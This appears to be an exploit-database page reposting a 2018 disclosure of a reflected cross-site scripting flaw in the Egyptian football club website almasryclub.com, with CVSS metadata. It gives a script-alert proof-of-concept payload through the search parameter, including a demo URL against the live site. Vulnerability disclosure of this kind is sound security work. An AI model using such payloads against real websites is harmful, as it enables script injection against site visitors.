Advertisement






almasryclub (Egyption FC) - Cross Site Scripting ( XSS ) Vulnerability

CVE Category Price Severity
N/A CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-03-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018030142

Below is a copy:

almasryclub (Egyption FC) - Cross Site Scripting ( XSS ) Vulnerability
# Exploit title: almasryclub  - Cross Site Scripting ( XSS ) Vulnerability
# Date: 2018-03-19
# Exploit Author: Elsfa7-110 ( [email protected] )
Vendor Homepage: https://www.almasryclub.com
# Category: Web Application
# Dork: N/A
# =============================
# Description:
# I discovered a XSS vulnerability in almasryclub. This vulnerability allows bad guy executes javascript commands on 
# target. In this target, attacker can enter his javascript command through url. like this :
# http://Server/s=<script>alert("Elsfa7")</script>
#=============================
Demo :
# http://almasryclub.com/?s=<script>alert("Elsfa7")</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.